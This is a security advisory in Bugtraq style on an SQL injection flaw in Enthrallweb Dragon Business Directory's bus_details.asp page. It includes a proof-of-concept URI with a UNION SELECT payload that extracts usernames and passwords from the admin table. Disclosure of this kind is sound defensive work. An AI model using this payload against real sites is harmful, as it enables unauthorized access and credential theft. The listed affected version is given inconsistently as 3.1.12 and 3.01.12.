Dragon Business Directory Bus_Details.ASP SQL Injection Vulnerability

Bugtraq ID:	21747
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Dec 26 2006 12:00AM
Updated:	Jan 02 2007 08:46PM
Credit:	ajann is credited with the discovery of this vulnerability.
Vulnerable:	Enthrallweb Dragon Business Directory 3.1.12
Not Vulnerable:

Dragon Business Directory Bus_Details.ASP SQL Injection Vulnerability

Dragon Business Directory is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Dragon Business Directory 3.01.12 and prior versions are vulnerable to this issue.

Dragon Business Directory Bus_Details.ASP SQL Injection Vulnerability

Attackers may use a browser to trigger this issue.

The following proof-of-concept URI is available:

http://www.example.com/bus_details.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin

Dragon Business Directory Bus_Details.ASP SQL Injection Vulnerability

Solution:
Currently we are not aware of any solutions for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].

Dragon Business Directory Bus_Details.ASP SQL Injection Vulnerability

References:

• Dragon Business Directory Home Page (Enthrallweb)